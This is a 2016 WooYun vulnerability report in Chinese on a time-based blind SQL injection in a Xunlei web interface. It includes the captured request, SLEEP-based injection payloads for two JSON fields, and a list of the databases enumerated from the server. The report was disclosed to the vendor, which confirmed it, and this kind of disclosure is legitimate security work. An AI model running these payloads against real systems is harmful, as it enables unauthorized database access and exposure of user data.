当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0211405

漏洞标题:迅雷一处时间盲注

相关厂商:迅雷

漏洞作者: sauce

提交时间:2016-05-21 16:03

修复时间:2016-07-07 10:20

公开时间:2016-07-07 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-21: 细节已通知厂商并且等待厂商处理中
2016-05-23: 厂商已经确认,细节仅向厂商公开
2016-06-02: 细节向核心白帽子及相关领域专家公开
2016-06-12: 细节向普通白帽子公开
2016-06-22: 细节向实习白帽子公开
2016-07-07: 细节向公众公开

简要描述:

rt
必须吐槽一下迅雷src的页面怎么那么简洁
完全不知道怎么在那提交

详细说明:

抓的post包

POST /location/upload_peerinfo HTTP/1.1
Host: interface.xl9.xunlei.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: sessionid=CC824A20602118045BF9B8150499AD86; userid=50947382; peerid=50E549E88890F5GQ; client=pc; v=7.10.33.358
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
{"cpu":"","devicename":"ZHONGWEN","devicetype":"pc","imei":"","memory":""}


devicename\devicetype 都是注入点

漏洞证明:

---
Parameter: JSON devicename ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: {"cpu":"","devicename":"ZHONGWEN' AND (SELECT * FROM (SELECT(SLEEP(5)))DEhT) AND 'AgGq'='AgGq","devicetype":"pc","imei":"","memory":""}
Parameter: JSON devicetype ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: {"cpu":"","devicename":"ZHONGWEN","devicetype":"pc' AND (SELECT * FROM (SELECT(SLEEP(5)))KNUs) AND 'HTgX'='HTgX","imei":"","memory":""}
---


available databases [6]:
[*] `xl9\x81\x81omplain`
[*] information_schema
[*] x
[*] xl9_location
[*] xl9_tracer
[*] xl9_user_ip_loc


[15:55:53] [INFO] fetching tables for database: 'xl9_user_ip_loc'
[15:55:53] [INFO] fetching number of tables for database 'xl9_user_ip_loc'
[15:55:53] [INFO] resumed: 257


xl9_user_ip_loc 这个库挺大的 都是用户记录的ip吧 。

修复方案:

过滤

版权声明:转载请注明来源 sauce@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-05-23 10:13

厂商回复:

感谢您的反馈,漏洞可直接发送到 。

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-21 19:52 | 唐小风 ( 路人 | Rank:8 漏洞数:3 | 假设你爱上一个姑娘,她有迷人的眼睛和嘴唇...)

    人家提交是让你直接发人家邮箱

  2. 2016-05-22 09:52 | sauce ( 普通白帽子 | Rank:300 漏洞数:47 | 面向人民币编程)

    @唐小风 第一次见这么草率的。。。

  3. 2016-05-22 11:33 | 唐小风 ( 路人 | Rank:8 漏洞数:3 | 假设你爱上一个姑娘,她有迷人的眼睛和嘴唇...)

    @sauce 不能把他服务器拿下来的注入 都不叫注入吧

  4. 2016-05-22 12:04 | jackyu ( 路人 | Rank:28 漏洞数:18 | 世界上没有一个系统是绝对安全的,系统最大...)

    @唐小风 拿到shell再说

  5. 2016-05-22 12:08 | 唐小风 ( 路人 | Rank:8 漏洞数:3 | 假设你爱上一个姑娘,她有迷人的眼睛和嘴唇...)

    @jackyu 我是菜 这个任务交给你了

  6. 2016-05-23 10:16 | Vinc ( 普通白帽子 | Rank:383 漏洞数:58 | 提莫队长正在待命!)

    666

  7. 2016-05-23 10:18 | sauce ( 普通白帽子 | Rank:300 漏洞数:47 | 面向人民币编程)

    @迅雷 这么实诚 给点rank好高啊

  8. 2016-05-23 10:44 | 我在不想理你 ( 普通白帽子 | Rank:203 漏洞数:60 | 人生路漫漫)

    看来你最近开始闲了啊